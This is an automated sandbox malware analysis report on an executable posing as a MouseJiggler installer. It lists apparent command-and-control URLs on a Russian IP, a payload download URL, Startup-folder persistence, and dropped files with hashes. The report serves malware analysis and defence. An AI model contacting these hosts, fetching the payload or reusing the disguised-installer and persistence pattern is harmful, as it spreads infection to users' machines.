                                                      http://crl.certum.pl/cscasha2.crl0qAc372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drfalse
                                                        		high
                                                        http://creativecommons.org/ns#libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-JU5SL.tmp.14.drfalse
                                                          		high
                                                          https://fontawesome.com/license/free.libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://cscasha2.ocsp-certum.com04Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.gentee.comBAc372JNTO6.exe, 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://mousejiggler.orgAc372JNTO6.exe, 00000000.00000002.326145316.0000000002636000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtdlibupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-JU5SL.tmp.14.drfalse
                                                              		high
                                                              http://91.241.19.101/g7vcSfkbDs2/index.php(sqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://91.241.19.101/g7vcSfkbDs2/index.php?scr=1SfkbDs2/index.phpsqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://91.241.19.101/g7vcSfkbDs2/index.php219sqconfig.exe, 00000013.00000002.546095216.0000000003650000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://91.241.19.101/g7vcSfkbDs2/index.phpistributedsqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://91.241.19.101/g7vcSfkbDs2/index.php?scr=19ssqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://bootswatch.comlibupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://www.inkscape.org/namespaces/inkscapelibupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-JU5SL.tmp.14.drfalse
                                                                  		high
                                                                  https://a.pomf.cat/llbjiv.exe.Ac372JNTO6.exe, 00000000.00000002.325694255.000000000252B000.00000004.00000001.sdmptrue
                                                                  • Avira URL Cloud: safe
                                                                  		unknown

                                                                  Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  91.241.19.101
                                                                  		unknownRussian Federation
                                                                  		57678REDBYTES-ASRUtrue
                                                                  69.39.225.3
                                                                  		a.pomf.catUnited States
                                                                  		32181ASN-GIGENETUStrue

                                                                  Private

                                                                  IP
                                                                  192.168.2.1
                                                                  192.168.2.3
                                                                  127.0.0.1

                                                                  General Information

                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                  Analysis ID:494766
                                                                  Start date:30.09.2021
                                                                  Start time:23:51:24
                                                                  Joe Sandbox Product:CloudBasic
                                                                  Overall analysis duration:0h 13m 29s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Sample file name:Ac372JNTO6.exe
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                  Number of analysed new started processes analysed:32
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • HDC enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal54.troj.evad.winEXE@20/218@1/5
                                                                  EGA Information:Failed
                                                                  HDC Information:
                                                                  • Successful, ratio: 35.7% (good quality ratio 34.5%)
                                                                  • Quality average: 81.1%
                                                                  • Quality standard deviation: 25.1%
                                                                  HCA Information:Failed
                                                                  Cookbook Comments:
                                                                  • Adjust boot time
                                                                  • Enable AMSI
                                                                  • Found application associated with file extension: .exe
                                                                  Warnings:
                                                                  Show All
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 23.54.113.53, 23.54.113.104, 20.50.102.62, 20.54.110.249, 40.112.88.60, 2.18.107.211, 2.18.108.150, 20.199.120.85, 23.0.174.200, 23.0.174.185, 23.10.249.43, 23.10.249.26, 20.199.120.182
                                                                  • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e15275.g.akamaiedge.net, a1449.dscg2.akamai.net, arc.msn.com, cdn.onenote.net.edgekey.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, wildcard.weather.microsoft.com.edgekey.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, tile-service.weather.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, e1553.dspg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  23:52:47API Interceptor2481x Sleep call for process: sqconfig.exe modified
                                                                  23:52:53AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sqlite_configurator.lnk

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  No context

                                                                  Domains

                                                                  No context

                                                                  ASN

                                                                  No context

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Program Files (x86)\MouseJiggler\MouseJiggler.exe
                                                                  Process:C:\Users\user\Desktop\Ac372JNTO6.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):51200
                                                                  Entropy (8bit):7.202804953142948
                                                                  Encrypted:false
                                                                  SSDEEP:768:kpYSNHOIBe+IG3PKn928ghpIxpRr070WmUeDQJ4C:QYSNH9Bx63r077NI+4C
                                                                  MD5:47E518E3DCFD09346F8217CC58807858
                                                                  SHA1:01BE7D5316421C7506B4B3BFF610CAFE1902E099
                                                                  SHA-256:10B255A2B68A4EE05893179FD91C074AD7C94D408A249968FC11C1433A41EE1D
                                                                  SHA-512:AD90B05DB17EEEB45C540B076DE967FE2AAE5017B99DB54A65F7FC2087E23FD98E4782F15014F028D21A7D00444985015CD2BADB538A93A814D3A0D3C359DEC1
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....VL................................. ........@.. ....................... ............@.................................4...W.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H............$.........../..P...........................................z.,..{....,..{....o......(....*..0...........s....}.........(....s.......{....s....}.....s....}.....s....}.....s....}.....(.....{.... ....o.....{...........s....o.....{.....o.....{........s....o ....{....r...po!....{.....\..s"...o#....{.....o$....{....r...po%....{.....o&....{...........s....o'....{.....o.s....o ....{....r3..po!....{.....!..s"...o#....{.....o$....{....rE..po%....{.....o&....{...........s..
                                                                  C:\Program Files (x86)\MouseJiggler\libupdate.exe
                                                                  Process:C:\Users\user\Desktop\Ac372JNTO6.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):5886456
                                                                  Entropy (8bit):7.911132890112947
                                                                  Encrypted:false
                                                                  SSDEEP:98304:QSiTNi5icScWNZ5ou+QoNpTXn01qDlADDRnnDg3tciD3jr7gdqQHIzH6CR9GDwSX:gkidZ5oFN101umA3PyqQH1e2wSPF1
                                                                  MD5:B1210A977CE23D855A58376927C014A6
                                                                  SHA1:6F30E18E4275AE85FBC64CED7541AE597FC384F4
                                                                  SHA-256:EB861C00B323F9CE68CD3A3616BA3FB16726C48AE8E3E997BE011635B063255F
                                                                  SHA-512:B5C3CD87E469EA433A09AE746C2CEE2D40F98E5DBC9CF7E808F42B978807B330106680FA7BD4978BE602E2AD6EEC85E4BB382D04153C3093DFE18C67A53AB9D4
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Metadefender, Detection: 9%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 31%
                                                                  Reputation:unknown
                                                                  Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...'..`.................P...T.......^.......p....@.......................................@......@...................@....... ..6....p..............8.Y......................................`......................."..D....0.......................text....6.......8.................. ..`.itext.......P.......<.............. ..`.data....7...p...8...T..............@....bss.....m...............................idata..6.... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc........p......................@..@....................................@..@........................................................
                                                                  C:\Program Files (x86)\MouseJiggler\uninstall.exe
                                                                  Process:C:\Users\user\Desktop\Ac372JNTO6.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):987136
                                                                  Entropy (8bit):7.968685484415772
                                                                  Encrypted:false
                                                                  SSDEEP:24576:CQ9o65HYl7Du97vZo0yIsoTcc1Uiwz7H00svO7WOpMmj:CQNip2vZomsoj23zL00svqWO
                                                                  MD5:2F64483755D4A8EAF42EA86F080168A9
                                                                  SHA1:7C717E7B633C7EA2186152C2AF2CDBF7CCB64189
                                                                  SHA-256:5D21CB12C1DCADC35CFCB35E5FEF9EC7DA9204CF5C04E03B6EA7B847738BFFFF
                                                                  SHA-512:944BCD901E5B23C6D43FE6434A0EEE15416B0BF466FBF707AC42208A1E5CC57E1259E5FC336AE1D88A421B73A96C94A8D400480946C7852FBE5CF83D15E5A374
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.......................y........3........Rich...........................PE..L.....FM............................ ........ ....@.................................&.......................................4!..P........n........................................................................... ...............................text............................... ..`.rdata....... ....... ..............@..@.data...`....0.......0..............@....gentee.yU...@...`...@..............@..@.rsrc....n.......p..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Program Files (x86)\MouseJiggler\uninstall.ini
                                                                  Process:C:\Users\user\Desktop\Ac372JNTO6.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1192
                                                                  Entropy (8bit):4.968144665820202
                                                                  Encrypted:false
                                                                  SSDEEP:24:+jPUSjnjDtjaB58VBi8VBl8VBkK8VBkK18VBk158VBHq8VBC8VBg8VBb8VBNjx:+jcSjnj5jaBqPTPGPk7PkVPk8PHbPzPQ
                                                                  MD5:7515F6CC197C6C44C1B136AEB0FB77F0
                                                                  SHA1:5D41CA3BE935344FFA86A7E284DE22155580C9B1
                                                                  SHA-256:8691D818CE528A1F37F5F5686B85401FC0B0147258608F48E74F03DBC71BBD08
                                                                  SHA-512:16358FE445896621479844390203FE72C378178132657FDA2E83763AA30ACDB39B5D99AF23152FBEE815306FADF3AE6E124467A55075B5F648B65A286C5C516B
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: ..Q0,"C:\Program Files (x86)\MouseJiggler\MouseJiggler.exe",0..V0,"C:\Program Files (x86)\MouseJiggler",0..Q0,"C:\Program Files (x86)\MouseJiggler\uninstall.ini",0..Q0,"C:\Program Files (x86)\MouseJiggler\uninstall.exe",0..Q0,"C:\Users\user\Desktop\MouseJiggler.lnk",0..I0,2,"Software\Microsoft\Windows\CurrentVersion\Uninstall\MouseJiggler",""..I0,2,"Software\Microsoft\Windows\CurrentVersion\Uninstall\MouseJiggler","UninstallString"..I0,2,"Software\Microsoft\Windows\CurrentVersion\Uninstall\MouseJiggler","DisplayName"..I0,2,"Software\Microsoft\Windows\CurrentVersion\Uninstall\MouseJiggler","DisplayIcon"..I0,2,"Software\Microsoft\Windows\CurrentVersion\Uninstall\MouseJiggler","DisplayVersion"..I0,2,"Software\Microsoft\Windows\CurrentVersion\Uninstall\MouseJiggler","InstallLocation"..I0,2,"Software\Microsoft\Windows\CurrentVersion\Uninstall\MouseJiggler","Publisher"..I0,2,"Software\Microsoft\Windows\CurrentVersion\Uninstall\MouseJiggler","URLInfoAbout"..I0,2,"Software\Microsoft\Windows\C
                                                                  C:\Users\user\AppData\Local\Temp\152138533219
                                                                  Process:C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                  Category:dropped
                                                                  Size (bytes):8936540
                                                                  Entropy (8bit):7.901630644901793
                                                                  Encrypted:false
                                                                  SSDEEP:196608:ammmmmm+vv++HddXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm8MMMMMl:ammmmmm+vv++HddXMMMMMMMMMMMMMMMd
                                                                  MD5:5608A6D573FD691D1722CCD899C30671
                                                                  SHA1:B69602572709EAD4BD8BC3BF3BA34993B85175DB
                                                                  SHA-256:A1AE2F2A0A57260932E92F4FE55D44497B370D5046711449BDCEA4C61A754040
                                                                  SHA-512:C3438E91F5680F637EABBC3B803C718B0C88D3887BA25E2A7E5522DDCA7025F588F352D6F108B6D0D5761A806519A1E5A7814F69429DBD82DD76166A2FC15376
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: ......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.|..).?.H.'.|....).?m.....h.t......|4.%...d....
                                                                  C:\Users\user\AppData\Local\Temp\15213853321935212556
                                                                  Process:C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  File Type:empty
                                                                  Category:dropped
                                                                  Size (bytes):0
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:
                                                                  C:\Users\user\AppData\Local\Temp\deldll.bat
                                                                  Process:C:\Users\user\Desktop\Ac372JNTO6.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):200
                                                                  Entropy (8bit):4.754018559611602
                                                                  Encrypted:false
                                                                  SSDEEP:6:hE+skFE8FomBLJrRXlBL79LRLbk3YYUvOxEY:NfE8Fp9JFXl97ptbk3Y9VY
                                                                  MD5:EA190EF9B139757A890CD48BDD44B0EE
                                                                  SHA1:95C684E41BF7919408816AAFAB881621FFACE202
                                                                  SHA-256:9131DE0FCAAF968896AF9D58B6F37B4AA443455BB97C97BC142F295CEE577BC4
                                                                  SHA-512:22802FFC1965C8E27F799EE88E3FA46DEBB316C27507A570B0812BC5DE0D59A9C2A2105B8CC204851B3C29984EF1DFB7842131819952B185B7E4325A032FB6AD
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: @echo off..for /L %%i in (1,1,10) do (..del "genteert.dll"..if not exist "genteert.dll" goto finish..ping -n 2 -w 1000 127.0.0.1 >nul || ping -n 2 -w 1000 ::1 >nul..)..:finish..del "deldll.bat"..cls..
                                                                  C:\Users\user\AppData\Local\Temp\genteeDA\2install - 1.bmp
                                                                  Process:C:\Users\user\Desktop\Ac372JNTO6.exe
                                                                  File Type:PC bitmap, Windows 3.x format, 80 x 245 x 8
                                                                  Category:dropped
                                                                  Size (bytes):20678
                                                                  Entropy (8bit):4.643328653513647
                                                                  Encrypted:false
                                                                  SSDEEP:384:8WRi4B0Ks8SGHAsFjn4srsJo6hbLVHAUw0EGXKnJzs+awGRbyt9+vA:xcEs8SGgqjn4srN6hbLVHAl0zanRs+aC
                                                                  MD5:E168634D6C44995C14608F16C2E28693
                                                                  SHA1:BF82C53A39B160821586EA51FE8DFC83A56CE0A0
                                                                  SHA-256:06263008AB7AB756D1254CE744B389F71B0DFFB186EBFA8BB0D2603271E9C6DA
                                                                  SHA-512:8AFE34C792062D21E6E34356B3F1186474173063E587262925C7965CB20E67941F96BCB4E3E0489E2DABDFC7E4D7A8D473366C5BC7FFF246F8A067A620DD6EF2
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: BM.P......6...(...P................L...................X....G...N...............#.....N.N.Y....t.....C.D.......F....h.P.....y..............o..R.x...<...p.T.T......<................N.@...+....3.Z..u$.l.~...2....2.u.|.......(.g.....d.n..g.g......d...y....,.F.w.L.u..........4~4...Y.h..........y.......-...f.>........,.l........F.^.J.j.t...............|...&.....W..........+.8v8.....-.w.(.O...z......U..J.....|...........h....I.....,........d.....$.q..w..W...........a.d.........Y......c........>......p...................T.w.5.....8.g...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Temp\genteeDA\4default - 1.bmp
                                                                  Process:C:\Users\user\Desktop\Ac372JNTO6.exe
                                                                  File Type:PC bitmap, Windows 3.x format, 49 x 49 x 24
                                                                  Category:dropped
                                                                  Size (bytes):7308
                                                                  Entropy (8bit):5.050462584080129
                                                                  Encrypted:false
                                                                  SSDEEP:96:8GC/gadQegjGYrUCuHWGMOVH2RoRZKyPC9EFI:8GC/pyPSO94qdRgO9EFI
                                                                  MD5:14A455E9EEF9FE7FEA4DE14D579A3E84
                                                                  SHA1:C0265607AB41C6724AB53065DDFC22E76110B011
                                                                  SHA-256:B666E6BD71EFF3547FB2F5580AC61C64527F6F9BE6A2178FA00F80E32431460A
                                                                  SHA-512:8F7368818EF80C0E835DE4E081315854979B427A8716F6F888985B53B59D8D6AD108AD534275404E667E7020E7B89D7014D55FE47D79A91AC1A92AEFB193CA30
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: BM........6...(...1...1............... ... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Temp\genteeDA\guig.dll
                                                                  Process:C:\Users\user\Desktop\Ac372JNTO6.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):20480
                                                                  Entropy (8bit):2.6530623787829106
                                                                  Encrypted:false
                                                                  SSDEEP:192:mxonubPh9zJCEvCZj6beDKnYFRJvS/QwC3:tubPh9N6N6k3z
                                                                  MD5:D3F8C0334C19198A109E44D074DAC5FD
                                                                  SHA1:167716989A62B25E9FCF8E20D78E390A52E12077
                                                                  SHA-256:005C251C21D6A5BA1C3281E7B9F3B4F684D007E0C3486B34A545BB370D8420AA
                                                                  SHA-512:9C890E0AF5B20CE9DB4284E726EC0B05B2A9F18B909FB8E595EDF3348A8F0D07D5238D85446A09E72E4FAA2E2875BEB52742D312E5163F48DF4072B982801B51
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gOlP#...#...#...u1..&...#...'...#...b...A1.......1..*....1.. ...Rich#...................PE..L......U...........!.........0............... ...............................P.......................................'......h!...............................@..(.................................................... ..(............................text............................... ..`.rdata....... ....... ..............@..@.data........0.......0..............@....reloc.......@.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Temp\genteeDA\libeay32.dll
                                                                  Process:C:\Users\user\Desktop\Ac372JNTO6.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1471856
                                                                  Entropy (8bit):6.829825814674756
                                                                  Encrypted:false
                                                                  SSDEEP:24576:LPQ+KpP0zhZ3gSHIjkkAf9v5jPSG9LZs7Av4aS4nYIMc9moiYplUmwBvWZK/hH1b:8ogSLdehClSuELxumKWiP8fq5a1mpbkp
                                                                  MD5:EC8B923F28B999650F35F0DB6365081B
                                                                  SHA1:24082734657C431F7D5B457D0EBBEBBFADD94012
                                                                  SHA-256:C88CC0DB0B53652B804BB0C84CE6E8159B146D91BE799E0B1F9DE88C0D7CE0AB
                                                                  SHA-512:248E3515C44AA144399E3BFE16FBA6088CBB19578C45FE31EDB9959FA135CEB7E208399EE5AD5F88F24D36E8088268F27E67EC33CE45CB4049F1F9D0B2B0B407
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A.W.A.W.A.W.%.V.A.W.%.VeA.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.A.WUA.W.A.W.A.W2%.V.C.W2%.V.A.W2%.W.A.W2%.V.A.WRich.A.W................PE..L....$y]...........!.....v................................................................@..........................r......H*..x.......X............B..p3..........@e..............................`e..@............................................text....t.......v.................. ..`.rdata..............z..............@..@.data........@...j... ..............@....rsrc...X...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Temp\genteeDA\setup_temp.gea
                                                                  Process:C:\Users\user\Desktop\Ac372JNTO6.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):18626
                                                                  Entropy (8bit):7.985158889375696
                                                                  Encrypted:false
                                                                  SSDEEP:384:0loTs1zpfIWE7uOAOrofLXyA/wtbpUjITQEqDPJLGlAPOGeT8R:0C4zpgWE7uOAOroTXyAYuZZzJw/GeAR
                                                                  MD5:14D052376821FA5832B7C9D2AF71B69C
                                                                  SHA1:4346677742A171A45AD9446DF7A9DE93923DF36E
                                                                  SHA-256:4612FBCBD395CA804FC2A01FB8369C3F5478428C3C478DD31A338EDA81F5B923
                                                                  SHA-512:B49BE279079657A7A4BDDDB736ABC31E90C785C53F4EC50DFD3B2A935946C610865CDFEF17FC3389750BD5554BF402E30B57CF3441C75E4E908793017C88F6C1
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: GEA..........^.................G...........H...............H..............G1.........)RN\.~..jt..-..f..J.zZ..=J.)IS...:..Q..;.?x[..N.%..@....y......d..-{b>....k.F..C].....2R. '..:....B...p.Q...q..ML.K}.v.h....f....mS..:,..a.:.,K..@.........V........C..n_..K.r.,"..Pjem..Br7dj..#.....F.=e.0.1.Ds[...X...nI..)2F.P.[..*nF.-.....(Q...k..(.n.1L..n..[yr.....lpJ.28)L$....S+....ML!...@a...Ra..@..P.w....X..2.'P$..B..BT....>.s.........z{..q.#.R...7.}.n...6....p.|-......6..W.../`...X..S.;. I5.M.....G xv...^.a..D\#....K.RlI..m.PwA....w._.U....aQ.X.u.......`......8.k.2W.X..=.R...y.J...8&....G.=.Q.................V.c.2....Y.$....T.@..V!..)@Eu..d.<70..C..Nd.>..K@..4~y.#m...\7..&.7.%.$s.....MUO..)..#...1v..&...o..&..|......%.jk..i.].;.d..D..}...g8..%Ij[....C^.r#.6....w..X........2{ ..@....iSw.+...;.U{.a.[h..2..t.l.z.I'.y..U.Q..}..P.G`.c`...K-.9.:../.#...m.b..kV.[1.%.%."....H..:.....k.U9...r-(T...j8.w...?.j....j....S......6.2p...o...*..<ta.....r)(.
                                                                  C:\Users\user\AppData\Local\Temp\genteeDA\ssleay32.dll
                                                                  Process:C:\Users\user\Desktop\Ac372JNTO6.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):392048
                                                                  Entropy (8bit):6.542966608472866
                                                                  Encrypted:false
                                                                  SSDEEP:6144:yeIwnft+S34NVSTjMFR+oVbKQfbno1/1oz6i2EDSD4I+XdtQXGMiFcoOjAWcIhbu:yeIwnft+S34NVSTQD+oVbKQfrC/1ct26
                                                                  MD5:9097F59E266183424D5C66C14DFA92D9
                                                                  SHA1:BF5E7E18054CA03CEE3F161C9E989581C4A8A0D7
                                                                  SHA-256:7A8DF4A622C1DFB87E33B6FA8E9056AC64A65A91D9B15CAC1928ED2B40250BCD
                                                                  SHA-512:BB1A152C4FCBF3C187AE52541CF31F342D37311BEBB8CF29B0DB5A9868FC40F8AE0502E7A7D8363BEE758ACF1DAF440419FA301AF44F5D13624D4B7B43B034C0
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.v[N.%[N.%[N.%4*.$QN.%4*.$.N.%4*.$IN.%4*.$YN.%.*.$HN.%.*.$GN.%.*.$KN.%.*.$XN.%[N.%.O.%.*.$iN.%.*.$ZN.%.*e%ZN.%.*.$ZN.%Rich[N.%........PE..L....$y]...........!.....8..........^7.......P......................................O^....@..........................6..<)..L_..<.......X...............p3.......3..@,..............................`,..@............P...............................text....7.......8.................. ..`.rdata..l....P.......<..............@..@.data....?...p...6...X..............@....rsrc...X...........................@..@.reloc...3.......4..................@..B................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Temp\genteert.dll
                                                                  Process:C:\Users\user\Desktop\Ac372JNTO6.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):61440
                                                                  Entropy (8bit):5.391391128836901
                                                                  Encrypted:false
                                                                  SSDEEP:768:BVPbKk9022j0efXs6X8zqk3pT3oMapzxc7Ep+DnSIiacDwGpr1a:BVTK+022j0V6mqMozpzxcXOpwEr1
                                                                  MD5:6CE814FD1AD7AE07A9E462C26B3A0F69
                                                                  SHA1:15F440C2A8498A4EFE2D9BA0C6268FAB4FB8E0A7
                                                                  SHA-256:54C0DA1735BB1CB02B60C321DE938488345F8D1D26BF389C8CB2ACAD5D01B831
                                                                  SHA-512:E5CFF6BCB063635E5193209B94A9B2F5465F1C82394F23F50BD30BF0A2B117B209F5FCA5AA10A7912A94AD88711DCD490AA528A7202F09490ACD96CD640A3556
                                                                  Malicious:false
                                                                  Reputation:unknown
